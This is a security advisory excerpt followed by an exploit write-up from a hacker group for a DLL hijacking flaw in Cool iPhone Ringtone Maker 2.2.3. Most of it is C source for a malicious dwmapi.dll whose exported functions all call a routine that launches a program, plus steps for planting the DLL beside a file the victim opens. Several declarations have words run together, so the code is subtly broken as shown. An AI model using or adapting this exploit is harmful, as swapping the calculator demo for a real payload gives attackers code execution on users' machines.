扫码分享
验证:
体验盒子// source: https://www.securityfocus.com/bid/44205/info
Cool iPhone Ringtone Maker is prone to a vulnerability that lets attackers execute arbitrary code.
An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to open a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file.
Cool iPhone Ringtone Maker 2.2.3 is vulnerable; other versions may also be affected.
===================================================
Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll)
===================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \__/'__`\/\ \__/'__`\ 0
0/\_, \___ /\_\/\_\ \ \___\ \ ,_\/\ \/\ \_ ___ 1
1\/_/\ \ /' _ `\ \/\ \/_/_\_<_/'___\ \ \/\ \ \ \ \/\`'__\0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1\ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/\/____/ \/__/ \/___/\/_/ 1
1\ \____/ >> Exploit database separated by exploit 0
0 \/___/type (local, remote, DoS, etc.)1
11
0[+] Site: Inj3ct0r.com0
1[+] Support e-mail: submit[at]inj3ct0r.com1
00
1 #########################################1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team1
1 #########################################0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#Cool Iphone Ringtone DLL Hijacking Exploit (dwmapi.dll)
#Author: anT!-Tr0J4n
#Greetz: Dev-PoinT.com ~ inj3ct0r.com~ All Dev-poinT members and my friends
#Email: D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Software : http://www.coolrecordedit.com
#Version: 2.2.3
#Tested on: Windows? XP sp3
#Home : www.Dev-PoinT.com$ http://inj3ct0r.com
==========================
HowTO use : Compile and rename todwmapi.dll , create a file in the same dir with one of the following extensions.
check the result > Hack3d
==========================
# dwmapi.dll(code)
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT voidDwmDefWindowProc() { evil(); }
DLLIMPORT voidDwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT voidDwmEnableComposition() { evil(); }
DLLIMPORT voidDwmEnableMMCSS() { evil(); }
DLLIMPORT voidDwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT voidDwmGetColorizationColor() { evil(); }
DLLIMPORT voidDwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT voidDwmGetWindowAttribute() { evil(); }
DLLIMPORT voidDwmIsCompositionEnabled() { evil(); }
DLLIMPORT voidDwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT voidDwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT voidDwmRegisterThumbnail() { evil(); }
DLLIMPORT voidDwmSetDxFrameDuration() { evil(); }
DLLIMPORT voidDwmSetPresentParameters() { evil(); }
DLLIMPORT voidDwmSetWindowAttribute() { evil(); }
DLLIMPORT voidDwmUnregisterThumbnail() { evil(); }
DLLIMPORT voidDwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
============================================
special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
=============================================
体验盒子
